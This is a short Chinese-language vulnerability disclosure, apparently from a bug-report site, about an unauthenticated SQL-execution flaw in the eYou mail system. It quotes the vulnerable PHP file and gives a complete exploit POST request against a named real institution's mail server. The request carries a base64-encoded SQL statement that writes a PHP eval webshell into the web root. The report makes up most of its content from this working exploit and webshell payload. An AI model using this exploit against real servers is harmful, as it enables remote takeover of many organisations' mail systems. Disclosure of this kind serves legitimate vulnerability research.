亿邮邮件系统SQL导致批量GetShell（无需登录）

### 简要描述： 亿邮邮件系统SQL导致批量GetShell（至少几百个单位） ### 详细说明： 漏洞文件：\php\bill\print_addfeelog.php 执行任意SQL命令，且不受GPC影响。 默认MYSQL都是有权限导出文件权限的，可以导出一句话后门。 ``` <? include("include/config.inc"); include("include/mysql_wrap.php"); include("include/utils.php"); include("include/message.php"); include("common/check_admin.php"); $sql = base64_decode($_REQUEST['all_sql']); $eyouSql = new eyousql(); $eyouSql->query($sql); ?> ``` 利用代码： ``` POST /php/bill/print_addfeelog.php HTTP/1.1 Content-Length: 140 Host: mail.sihs.edu.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us Accept-Encoding: gzip,deflate Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive X-Forwarded-For: 127.0.0.1 Cookie: cookie=1; all_sql=c2VsZWN0ICc8P3BocCBldmFsKCRfUE9TVFsxXSk/PmMnIGludG8gb3V0ZmlsZSAnL3Zhci9leW91L2FwYWNoZS9odGRvY3MvcGhwL2JpbGwvc2NyaXB0L2luZGV4LnBocCc7 ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/12081253b82d5675029d4e106190c237e2bf3d22.jpg" alt="QQ截图20140712081234.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/12081253b82d5675029d4e106190c237e2bf3d22.jpg)